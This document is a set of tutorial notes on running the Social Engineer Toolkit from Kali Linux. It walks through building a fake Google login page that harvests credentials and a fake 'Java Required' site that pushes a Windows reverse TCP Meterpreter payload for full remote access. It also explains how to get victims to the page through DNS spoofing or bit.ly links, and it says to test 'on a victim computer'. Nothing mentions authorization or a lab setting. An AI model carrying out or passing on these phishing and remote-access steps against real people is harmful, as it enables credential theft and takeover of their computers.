Social Engineering Toolkit (SET)

The Social Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly.

Start SET

Kali Linux menu -> 08 – Exploitation Tools -> social engineering toolkit (SET)

/usr/share/set/setoolkit
sudo setoolkit

Credential Harvest

Create a fake web page to obtain credentials, undetectable, any platform

# Get Kali Linux IP address for fake website
ifconfig

# Run SET
/usr/share/set/setoolkit
or
Kali Linux menu -> 08 – Exploitation Tools -> social engineering toolkit (SET)

Enter 1 for social engineering attacks
Enter 2 for website attack vector
Enter 3 for credential harvester
Enter 1 for web templates (common websites like "java required", google, facebook, twitter, yahoo)
NAT is used when doing the attack remotely, in same network say "no"
Enter IP: x.x.x.x
Enter 2 for google

# All fields captured will be displayed in SET
# Reports in /root/.set//reports/

# Test
Open a browser and type Kali Linux IP http://x.x.x.x

# Convince user to open Kali Linux IP in a browser:
Option 1: If user is on the same network, do DNS spoofing on google.com
Option 2: go on bit.ly to create a shortened url, often used by social media sites like twitter and facebook

Malicious Site

Create a fake web page with malicious code embedded that will infect the computer and give full access to it.

# Get Kali Linux IP address for fake website
ifconfig

# Run SET
/usr/share/set/setoolkit
or
Kali Linux menu -> 08 – Exploitation Tools -> social engineering toolkit (SET)

Enter 1 for social engineering attacks
Enter 2 for website attack vector
Enter 1 for Java Applet attack # will create website with java applet in it
Enter 1 for web templates (common websites like "java required", google, facebook, twitter, yahoo)
NAT is used when doing the attack remotely, in same network say "no"
Enter IP: x.x.x.x
Enter 2 to use applet built in SET (option 1 requires paying for a certificate)
Enter 1 for Java Required template
Enter 2 for Meterpreter multi-memory injection
Enter 1 for Windows Reverse TCP Meterpreter (will connect back to my computer)
Enter port: leave default 443
Enter 6 to finish adding payloads

# Test ON A VICTIM COMPUTER, NOT ON MY OWN!!
Open a browser and type Kali Linux IP http://x.x.x.x

# Convince user to open Kali Linux IP in a browser:
Option 1: If user is on the same network, do DNS spoofing on google.com
Option 2: go on bit.ly to create a shortened url, often used by social media sites like twitter and facebook

# When getting a connection with meterpreter
sessions